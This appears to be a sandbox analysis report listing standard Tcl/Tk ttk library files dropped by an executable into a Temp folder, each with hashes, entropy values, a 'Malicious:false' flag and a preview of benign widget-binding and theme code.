                                                                                                                                                                                                                                                    Preview:#.# Bindings for Buttons, Checkbuttons, and Radiobuttons..#.# Notes: <Button1-Leave>, <Button1-Enter> only control the "pressed".# state; widgets remain "active" if the pointer is dragged out..# This doesn't seem to be conventional, but it's a nice way.# to provide extra feedback while the grab is active..# (If the button is released off the widget, the grab deactivates and.# we get a <Leave> event then, which turns off the "active" state).#.# Normally, <ButtonRelease> and <ButtonN-Enter/Leave> events are .# delivered to the widget which received the initial <ButtonPress>.# event. However, Tk [grab]s (#1223103) and menu interactions.# (#1222605) can interfere with this. To guard against spurious.# <Button1-Enter> events, the <Button1-Enter> binding only sets.# the pressed state if the button is currently active..#..namespace eval ttk::button {}..bind TButton <Enter> ..{ %W instate !disabled {%W state active} }.bind TButton <Leave>..{ %W state !active }.bind TButton <Key-space>.{ ttk:

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tk\ttk\clamTheme.tcl

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):4261
                                                                                                                                                                                                                                                    Entropy (8bit):4.849408646746382
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:48:9NlU3tCKW3PiAu4UZQsk+EBSucCtCqM368CtTU/+RR8Rf/sY2+rF+xzFjueNoDKM:SHjO7uCkqM3JCNU/RrVb
                                                                                                                                                                                                                                                    MD5:F2EEFF6F288437CA0DA802F6844A414C
                                                                                                                                                                                                                                                    SHA1:61A722FFDA5F5FBA842F673AC3B95062452567C2
                                                                                                                                                                                                                                                    SHA-256:4CC2DC26FE379F69CE46A73ABFBABEB9DD5509C41616E1D5A8395BE94170C62C
                                                                                                                                                                                                                                                    SHA-512:23DA52FA6E8046CF383BEFD338B96550DE253983EEB3F29F183AD4BFCDBDA730B93ED9C6F0EAE3CEE816FF978FD77DBBC8B1C714B18120B718EB017D37BCB0D7
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:#.# "Clam" theme..#.# Inspired by the XFCE family of Gnome themes..#..namespace eval ttk::theme::clam {. variable colors . array set colors {..-disabledfg."#999999"..-frame ."#dcdad5"..-window ."#ffffff"..-dark.."#cfcdc8"..-darker ."#bab5ab"..-darkest."#9e9a91"..-lighter."#eeebe7"..-lightest ."#ffffff"..-selectbg."#4a6984"..-selectfg."#ffffff". }.. ttk::style theme settings clam {...ttk::style configure "." \.. -background $colors(-frame) \.. -foreground black \.. -bordercolor $colors(-darkest) \.. -darkcolor $colors(-dark) \.. -lightcolor $colors(-lighter) \.. -troughcolor $colors(-darker) \.. -selectbackground $colors(-selectbg) \.. -selectforeground $colors(-selectfg) \.. -selectborderwidth 0 \.. -font TkDefaultFont \.. ;...ttk::style map "." \.. -background [list disabled $colors(-frame) \.... active $colors(-lighter)] \.. -foreground [list disabled $colors(-disabledfg)] \.. -selectbackground [list !focus $colors(-darkest

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tk\ttk\classicTheme.tcl

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):3520
                                                                                                                                                                                                                                                    Entropy (8bit):4.904850162459333
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:48:yAJZjsTMw9EEy6kvzuVubguxjFVGQJFVGQuxzUFIGQutK2MRvD7J+iSVaND2kG/h:yAJZ8MhJiV8fVIV7Urt
                                                                                                                                                                                                                                                    MD5:8071763DA22437B3DBBA8276DFCB31D9
                                                                                                                                                                                                                                                    SHA1:FBC8DC3198F49A6915A8AB6B4A388450B71A998D
                                                                                                                                                                                                                                                    SHA-256:92F7BEFAD42820E988806601DCA49719FA651C88B8767B3347B13706EE3C17F9
                                                                                                                                                                                                                                                    SHA-512:E49B2DDBA1FC6E53BAA5B39AAAD496B6931562CB135F8EAB495661229FAD7085CEBDEA28221F3D1927B96012E3B3AD1ECD41A36E42AD672628F9FD2C755C07D4
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:#.# "classic" Tk theme..#.# Implements Tk's traditional Motif-like look and feel..#..namespace eval ttk::theme::classic {.. variable colors; array set colors {..-frame.."#d9d9d9"..-window.."#ffffff"..-activebg."#ececec"..-troughbg."#c3c3c3"..-selectbg."#c3c3c3"..-selectfg."#000000"..-disabledfg."#a3a3a3"..-indicator."#b03060". }.. ttk::style theme settings classic {..ttk::style configure "." \.. -font..TkDefaultFont \.. -background..$colors(-frame) \.. -foreground..black \.. -selectbackground.$colors(-selectbg) \.. -selectforeground.$colors(-selectfg) \.. -troughcolor.$colors(-troughbg) \.. -indicatorcolor.$colors(-frame) \.. -highlightcolor.$colors(-frame) \.. -highlightthickness.1 \.. -selectborderwidth.1 \.. -insertwidth.2 \.. ;...# To match pre-Xft X11 appearance, use:..#.ttk::style configure . -font {Helvetica 12 bold}...ttk::style map "." -background \.. [list disabled $colors(-frame) active $colors(-activebg)]..ttk::style map "." -

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tk\ttk\combobox.tcl

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):12394
                                                                                                                                                                                                                                                    Entropy (8bit):5.023972528049574
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:192:l/9k9hqpFXQN9lQt3NvnIW+KYNbrulkL90t98VrQETczIT9QeSaQjJI1/P0lcLrM:BhlLtVL5MmIRK
                                                                                                                                                                                                                                                    MD5:CF03B3F5E179F5032AFB6355905636A0
                                                                                                                                                                                                                                                    SHA1:D4C7EAC03B8ECAD6A94E7A9EB7BBFF562768ED3C
                                                                                                                                                                                                                                                    SHA-256:30BB473C0471F4D015FCF4B51044A026520D53927F61F3D514EA53B8AF0BCF67
                                                                                                                                                                                                                                                    SHA-512:DAE0DDB29D6E1E38EF65C70001BF836F1A12CFA9246658A87DFBBE02F6CB949C00F0A2ADBCA6C2200D583F2AB71F3E6BAB02C754801C0EAEEB2880D2ACD91122
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:#.# Combobox bindings..#.# <<NOTE-WM-TRANSIENT>>:.#.#.Need to set [wm transient] just before mapping the popdown.#.instead of when it's created, in case a containing frame.#.has been reparented [#1818441]..#.#.On Windows: setting [wm transient] prevents the parent.#.toplevel from becoming inactive when the popdown is posted.#.(Tk 8.4.8+).#.#.On X11: WM_TRANSIENT_FOR on override-redirect windows.#.may be used by compositing managers and by EWMH-aware.#.window managers (even though the older ICCCM spec says.#.it's meaningless)..#.#.On OSX: [wm transient] does utterly the wrong thing..#.Instead, we use [MacWindowStyle "help" "noActivates hideOnSuspend"]..#.The "noActivates" attribute prevents the parent toplevel.#.from deactivating when the popdown is posted, and is also.#.necessary for "help" windows to receive mouse events..#."hideOnSuspend" makes the popdown disappear (resp. reappear).#.when the parent toplevel is deactivated (resp. reactivated)..#.(see [#1814778]). Also set [wm resiz

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tk\ttk\cursors.tcl

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):4007
                                                                                                                                                                                                                                                    Entropy (8bit):4.827479665184231
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:48:xtIni2E1nmuVoLlTxG6qVXvDiPOaCkhxKLbqnJ2RLWumgMJVZlZPDjsfMh8vIviX:sn+myoLBxG3laOqJlZT3rkdSVOJm0
                                                                                                                                                                                                                                                    MD5:74596004DFDBF2ECF6AF9C851156415D
                                                                                                                                                                                                                                                    SHA1:933318C992B705BF9F8511621B4458ECB8772788
                                                                                                                                                                                                                                                    SHA-256:7BDFFA1C2692C5D1CF67B518F9ACB32FA4B4D9936ED076F4DB835943BC1A00D6
                                                                                                                                                                                                                                                    SHA-512:0D600B21DB67BF9DADBDD49559573078EFB41E473E94124AC4D2551BC10EC764846DC1F7674DAA79F8D2A8AEB4CA27A5E11C2F30EDE47E3ECEE77D60D7842262
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:#.# Map symbolic cursor names to platform-appropriate cursors..#.# The following cursors are defined:.#.#.standard.-- default cursor for most controls.#.""..-- inherit cursor from parent window.#.none..-- no cursor.#.#.text..-- editable widgets (entry, text).#.link..-- hyperlinks within text.#.crosshair.-- graphic selection, fine control.#.busy..-- operation in progress.#.forbidden.-- action not allowed.#.#.hresize..-- horizontal resizing.#.vresize..-- vertical resizing.#.# Also resize cursors for each of the compass points,.# {nw,n,ne,w,e,sw,s,se}resize..#.# Platform notes:.#.# Windows doesn't distinguish resizing at the 8 compass points,.# only horizontal, vertical, and the two diagonals..#.# OSX doesn't have resize cursors for nw, ne, sw, or se corners..# We use the Tk-defined X11 fallbacks for these..#.# X11 doesn't have a "forbidden" cursor (usually a slashed circle);.# "pirate" seems to be the conventional cursor for this purpose..#.# Windows has an IDC_HELP cursor, but it's not

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tk\ttk\defaults.tcl

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):3684
                                                                                                                                                                                                                                                    Entropy (8bit):4.893081856580555
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:48:EyE4jTUC5zu/cbtCBRCbxcFfFIGQJFIGQkUFIG0uI+x3ouPcW88nKI+ifVaVCflC:nE+Uoi/hjB1+Atj/bf30QOdt
                                                                                                                                                                                                                                                    MD5:79F1C9D16EC1B66762E82B73113C3A12
                                                                                                                                                                                                                                                    SHA1:51544CECBDF72CE799A80373BE727A8AB9CCA34F
                                                                                                                                                                                                                                                    SHA-256:436CA9AD206F26DF3B4F665AB2EB60A24BB833699172EE91F5A1ADAAFAC9951F
                                                                                                                                                                                                                                                    SHA-512:7BAD8EBFF17E18C9BD7F336AEEDFAE67DB25303B6F7948362AF5C93F7945337592803A22CF676C25E8879F097A7DAEF9EA7A8036FF76723E0720CE7EB9ED46B8
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:#.# Settings for default theme..#..namespace eval ttk::theme::default {. variable colors. array set colors {..-frame.."#d9d9d9"..-foreground."#000000"..-window.."#ffffff"..-text ."#000000"..-activebg."#ececec"..-selectbg."#4a6984"..-selectfg."#ffffff"..-darker ."#c3c3c3"..-disabledfg."#a3a3a3"..-indicator."#4a6984". }.. ttk::style theme settings default {...ttk::style configure "." \.. -borderwidth .1 \.. -background .$colors(-frame) \.. -foreground .$colors(-foreground) \.. -troughcolor .$colors(-darker) \.. -font ..TkDefaultFont \.. -selectborderwidth.1 \.. -selectbackground.$colors(-selectbg) \.. -selectforeground.$colors(-selectfg) \.. -insertwidth .1 \.. -indicatordiameter.10 \.. ;...ttk::style map "." -background \.. [list disabled $colors(-frame) active $colors(-activebg)]..ttk::style map "." -foreground \.. [list disabled $colors(-disabledfg)]...ttk::style configure TButton \.. -anchor center -padding "3 3" -width -9 \..

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tk\ttk\entry.tcl

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):16655
                                                                                                                                                                                                                                                    Entropy (8bit):4.9802863039779375
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:192:hRy3ALQkHUx/KPTU3+h/IQzNiQ2iEL8QmOhQVqknFoTOXyJtcC1JMuZm41ZxO25t:GoU3+VmiEyOFWiTOEtcC1S252Ezp
                                                                                                                                                                                                                                                    MD5:D46463299EF819FE034E92B786E4911E
                                                                                                                                                                                                                                                    SHA1:B02D466BA9F0EF9C353E833B7BC85697EF2FE72E
                                                                                                                                                                                                                                                    SHA-256:CA47C52334F62660159FC197A054A0FE0017BD7B62E3295E74BA63D8379016B3
                                                                                                                                                                                                                                                    SHA-512:10AAD0003B61411DA510B96A8A237AA1942D473C1F3C46B50102FA1F3B7E880DE0C73F0B68EEB1A72E60BAAF1E2873EAFFBF9998E9017B947DA5F819386547DA
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:#.# DERIVED FROM: tk/library/entry.tcl r1.22.#.# Copyright (c) 1992-1994 The Regents of the University of California..# Copyright (c) 1994-1997 Sun Microsystems, Inc..# Copyright (c) 2004, Joe English.#.# See the file "license.terms" for information on usage and redistribution.# of this file, and for a DISCLAIMER OF ALL WARRANTIES..#..namespace eval ttk {. namespace eval entry {..variable State...set State(x) 0..set State(selectMode) none..set State(anchor) 0..set State(scanX) 0..set State(scanIndex) 0..set State(scanMoved) 0...# Button-2 scan speed is (scanNum/scanDen) characters..# per pixel of mouse movement...# The standard Tk entry widget uses the equivalent of..# scanNum = 10, scanDen = average character width...# I don't know why that was chosen...#..set State(scanNum) 1..set State(scanDen) 1..set State(deadband) 3.;# #pixels for mouse-moved deadband.. }.}..### Option database settings..#.option add *TEntry.cursor [ttk::cursor text]..### Bindings..#.# Removed the following

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tk\ttk\fonts.tcl

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):5576
                                                                                                                                                                                                                                                    Entropy (8bit):4.956417003071239
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:96:Nduphbitcq1Zs/ZrBiZy227IhLkdhetOstWGbRafkeHH+4:3CheHvsbiZyDmJbRa3+4
                                                                                                                                                                                                                                                    MD5:7017B5C1D53F341F703322A40C76C925
                                                                                                                                                                                                                                                    SHA1:57540C56C92CC86F94B47830A00C29F826DEF28E
                                                                                                                                                                                                                                                    SHA-256:0EB518251FBE9CF0C9451CC1FEF6BB6AEE16D62DA00B0050C83566DA053F68D0
                                                                                                                                                                                                                                                    SHA-512:FD18976A8FBB7E59B12944C2628DBD66D463B2F7342661C8F67160DF37A393FA3C0CE7FDDA31073674B7A46E0A0A7D0A7B29EBE0D9488AFD9EF8B3A39410B5A8
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:#.# Font specifications..#.# This file, [source]d at initialization time, sets up the following.# symbolic fonts based on the current platform:.#.# TkDefaultFont.-- default for GUI items not otherwise specified.# TkTextFont.-- font for user text (entry, listbox, others).# TkFixedFont.-- standard fixed width font.# TkHeadingFont.-- headings (column headings, etc).# TkCaptionFont -- dialog captions (primary text in alert dialogs, etc.).# TkTooltipFont.-- font to use for tooltip windows.# TkIconFont.-- font to use for icon captions.# TkMenuFont.-- used to use for menu items.#.# In Tk 8.5, some of these fonts may be provided by the TIP#145 implementation.# (On Windows and Mac OS X as of Oct 2007)..#.# +++ Platform notes:.#.# Windows:.#.The default system font changed from "MS Sans Serif" to "Tahoma".# .in Windows XP/Windows 2000..#.#.MS documentation says to use "Tahoma 8" in Windows 2000/XP,.#.although many MS programs still use "MS Sans Serif 8".#.#.Should use SystemParametersInfo() inst

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tk\ttk\menubutton.tcl

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):4886
                                                                                                                                                                                                                                                    Entropy (8bit):4.8399606995889455
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:96:1reigApQy38gaQJy+3nN+PN8JdN3OPqoK4J+wQCV7EkGxIaqc9ld9qtlWnITOZmd:hfbJvnN+PN8JdN3s64J+wQCPGxtqWrqf
                                                                                                                                                                                                                                                    MD5:06F570587F05FC9E20E2E841A5DDB938
                                                                                                                                                                                                                                                    SHA1:0E69C6AB9E03049592107BEDD37A9F9D45C7F139
                                                                                                                                                                                                                                                    SHA-256:8E6958FBC899BAEB1942E0E56D3B8CF135409949FF249D9858C777922BAFBC58
                                                                                                                                                                                                                                                    SHA-512:E150C38BDE8A5370212D456D125E3B6648DD0047AE3406C735D148E310D4CDEB8732EBA0B226C0E221BACF909D4BAB8104CCD6FDCAF5148E95AB7F389B14918F
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:#.# Bindings for Menubuttons..#.# Menubuttons have three interaction modes:.#.# Pulldown: Press menubutton, drag over menu, release to activate menu entry.# Popdown: Click menubutton to post menu.# Keyboard: <Key-space> or accelerator key to post menu.#.# (In addition, when menu system is active, "dropdown" -- menu posts.# on mouse-over. Ttk menubuttons don't implement this)..#.# For keyboard and popdown mode, we hand off to tk_popup and let .# the built-in Tk bindings handle the rest of the interaction..#.# ON X11:.#.# Standard Tk menubuttons use a global grab on the menubutton..# This won't work for Ttk menubuttons in pulldown mode,.# since we need to process the final <ButtonRelease> event,.# and this might be delivered to the menu. So instead we.# rely on the passive grab that occurs on <ButtonPress> events,.# and transition to popdown mode when the mouse is released.# or dragged outside the menubutton..# .# ON WINDOWS:.#.# I'm not sure what the hell is going on here. [$menu pos

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tk\ttk\notebook.tcl

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):5619
                                                                                                                                                                                                                                                    Entropy (8bit):4.937953914483602
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:96:d4tDJf49tzG809fhQAKWCgQOK/6PF+xEi8YYFSL+3FJVCj0QFK2kfJcQIni:d4tktzwfWngQOK/6PF+xDDYFNJVCj0QW
                                                                                                                                                                                                                                                    MD5:3495A94EF36592652ABF1B34298B1F58
                                                                                                                                                                                                                                                    SHA1:1D4AD25752A418B654AAD7F486A260DA312170CE
                                                                                                                                                                                                                                                    SHA-256:F44CA6DC4E54B73C43BBF546CD3E1EC1E7158024B76E0D8D99AE1477A8F50ED5
                                                                                                                                                                                                                                                    SHA-512:BDD114CF1253FFECF7B3C449FD5633B361AFB3723F8E608746E52453E8ED616085A96E691BB79AC1C3AC7057DAEEA660497E1769AA389341D66CF5137313534B
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:#.# Bindings for TNotebook widget.#..namespace eval ttk::notebook {. variable TLNotebooks ;# See enableTraversal.}..bind TNotebook <ButtonPress-1>..{ ttk::notebook::Press %W %x %y }.bind TNotebook <Key-Right>..{ ttk::notebook::CycleTab %W 1; break }.bind TNotebook <Key-Left>..{ ttk::notebook::CycleTab %W -1; break }.bind TNotebook <Control-Key-Tab>.{ ttk::notebook::CycleTab %W 1; break }.bind TNotebook <Control-Shift-Key-Tab>.{ ttk::notebook::CycleTab %W -1; break }.catch {.bind TNotebook <Control-ISO_Left_Tab>.{ ttk::notebook::CycleTab %W -1; break }.}.bind TNotebook <Destroy>..{ ttk::notebook::Cleanup %W }..# ActivateTab $nb $tab --.#.Select the specified tab and set focus..#.# Desired behavior:.#.+ take focus when reselecting the currently-selected tab;.#.+ keep focus if the notebook already has it;.#.+ otherwise set focus to the first traversable widget.#. in the newly-selected tab;.#.+ do not leave the focus in a deselected tab..#.proc ttk::notebook::ActivateTab {w tab} {.

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tk\ttk\panedwindow.tcl

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1920
                                                                                                                                                                                                                                                    Entropy (8bit):4.916119835701688
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:24:kfkVpfktNZz51kfkB6fkO/cfkyk2fkI4fkI1fkxUufkYfkEtNMiyHvyPHfk9tNZ5:0ZPhMiyHvyPQZNtiisZvUriZPaa+fdl
                                                                                                                                                                                                                                                    MD5:A12915FA5CAF93E23518E9011200F5A4
                                                                                                                                                                                                                                                    SHA1:A61F665A408C10419FB81001578D99B43D048720
                                                                                                                                                                                                                                                    SHA-256:CE0053D637B580170938CF552B29AE890559B98EB28038C2F0A23A265DDEB273
                                                                                                                                                                                                                                                    SHA-512:669E1D66F1223CCA6CEB120914D5D876BD3CF401EE4A46F35825361076F19C7341695596A7DBB00D6CFF4624666FB4E7A2D8E7108C3C56A12BDA7B04E99E6F9A
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:#.# Bindings for ttk::panedwindow widget..#..namespace eval ttk::panedwindow {. variable State. array set State {..pressed 0. .pressX.-..pressY.-..sash .-..sashPos -. }.}..## Bindings:.#.bind TPanedwindow <ButtonPress-1> .{ ttk::panedwindow::Press %W %x %y }.bind TPanedwindow <B1-Motion>..{ ttk::panedwindow::Drag %W %x %y }.bind TPanedwindow <ButtonRelease-1> .{ ttk::panedwindow::Release %W %x %y }..bind TPanedwindow <Motion> ..{ ttk::panedwindow::SetCursor %W %x %y }.bind TPanedwindow <Enter> ..{ ttk::panedwindow::SetCursor %W %x %y }.bind TPanedwindow <Leave> ..{ ttk::panedwindow::ResetCursor %W }.# See <<NOTE-PW-LEAVE-NOTIFYINFERIOR>>.bind TPanedwindow <<EnteredChild>>.{ ttk::panedwindow::ResetCursor %W }..## Sash movement:.#.proc ttk::panedwindow::Press {w x y} {. variable State.. set sash [$w identify $x $y]. if {$sash eq ""} {. .set State(pressed) 0..return. }. set State(pressed) .1. set State(pressX) .$x. set State(pressY) .$y. set State(sa

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tk\ttk\progress.tcl

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1089
                                                                                                                                                                                                                                                    Entropy (8bit):4.7101709883442755
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:24:o83oOUyNSiBj0oNA7h5EwIa2s0ImxamrNlUImyJDirNPpwWgJ:oMtS6j0eyEw0s02mhlU4khPp4J
                                                                                                                                                                                                                                                    MD5:B0074341A4BDA36BCDFF3EBCAE39EB73
                                                                                                                                                                                                                                                    SHA1:D070A01CC5A787249BC6DAD184B249C4DD37396A
                                                                                                                                                                                                                                                    SHA-256:A9C34F595E547CE94EE65E27C415195D2B210653A9FFCFB39559C5E0FA9C06F8
                                                                                                                                                                                                                                                    SHA-512:AF23563602886A648A42B03CC5485D84FCC094AB90B08DF5261434631B6C31CE38D83A3A60CC7820890C797F6C778D5B5EFF47671CE3EE4710AB14C6110DCC35
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:#.# Ttk widget set: progress bar utilities..#..namespace eval ttk::progressbar {. variable Timers.;# Map: widget name -> after ID.}..# Autoincrement --.#.Periodic callback procedure for autoincrement mode.#.proc ttk::progressbar::Autoincrement {pb steptime stepsize} {. variable Timers.. if {![winfo exists $pb]} {. .# widget has been destroyed -- cancel timer..unset -nocomplain Timers($pb)..return. }.. set Timers($pb) [after $steptime \. .[list ttk::progressbar::Autoincrement $pb $steptime $stepsize] ].. $pb step $stepsize.}..# ttk::progressbar::start --.#.Start autoincrement mode. Invoked by [$pb start] widget code..#.proc ttk::progressbar::start {pb {steptime 50} {stepsize 1}} {. variable Timers. if {![info exists Timers($pb)]} {..Autoincrement $pb $steptime $stepsize. }.}..# ttk::progressbar::stop --.#.Cancel autoincrement mode. Invoked by [$pb stop] widget code..#.proc ttk::progressbar::stop {pb} {. variable Timers. if {[info exists Timers($pb

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tk\ttk\scale.tcl

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):2662
                                                                                                                                                                                                                                                    Entropy (8bit):4.706471568010083
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:48:6Zs2iYagzZtYRqucO6wEKyRtZt0TcKVqZ4TFZkPDMiNf:WJyItYRquMwEKyFt0TcKVG4TrkLMwf
                                                                                                                                                                                                                                                    MD5:CB563E4CC3C309D66BA4D6841F7C65D9
                                                                                                                                                                                                                                                    SHA1:5F4FFFB858D6948A51FC8CB96225F1E4EB8E4931
                                                                                                                                                                                                                                                    SHA-256:F4BC65A8FFE7E9F9F3B1C3DF496B1B873FA308F38BD86E908E0F8D8EB1026119
                                                                                                                                                                                                                                                    SHA-512:E960488715BB8C084B08AB9B966F0F30F5741F604C55FC1C681D316A0924D8B95C69EA5EDFA81711FBAF10C7E53C2F235E9651E7A5AA091A31F341F3E3355AB2
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# scale.tcl - Copyright (C) 2004 Pat Thoyts <patthoyts@users.sourceforge.net>.#.# Bindings for the TScale widget..namespace eval ttk::scale {. variable State. array set State {..dragging 0. }.}..bind TScale <ButtonPress-1> { ttk::scale::Press %W %x %y }.bind TScale <B1-Motion> { ttk::scale::Drag %W %x %y }.bind TScale <ButtonRelease-1> { ttk::scale::Release %W %x %y }..bind TScale <ButtonPress-2> { ttk::scale::Jump %W %x %y }.bind TScale <B2-Motion> { ttk::scale::Drag %W %x %y }.bind TScale <ButtonRelease-2> { ttk::scale::Release %W %x %y }..bind TScale <ButtonPress-3> { ttk::scale::Jump %W %x %y }.bind TScale <B3-Motion> { ttk::scale::Drag %W %x %y }.bind TScale <ButtonRelease-3> { ttk::scale::Release %W %x %y }..bind TScale <Left> { ttk::scale::Increment %W -1 }.bind TScale <Up> { ttk::scale::Increment %W -1 }.bind TScale <Right> { ttk::scale::Increment %W 1 }.bind TScale <Down> { ttk::scale::Increment %W

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tk\ttk\scrollbar.tcl

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):3097
                                                                                                                                                                                                                                                    Entropy (8bit):4.913511104649656
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:96:OsSofRsvfH3Noo2kvrjnWG3Lcyst0Rhrdy:plcHdoorDjWEFeuTy
                                                                                                                                                                                                                                                    MD5:93181DBE76EF9C39849A09242D6DF8C0
                                                                                                                                                                                                                                                    SHA1:DE3B47AFC3E5371BF1CD0541790A9B78A97570AB
                                                                                                                                                                                                                                                    SHA-256:5932043286A30A3CFFB2B6CE68CCDB9172A718F32926E25D3A962AE63CAD515C
                                                                                                                                                                                                                                                    SHA-512:5C85284E063A5DE17F6CE432B3EF899D046A78725BD1F930229576BED1116C03A3EE0611B988E9903F47DA8F694483E5A76464450C48EB14622F6784004B8F7E
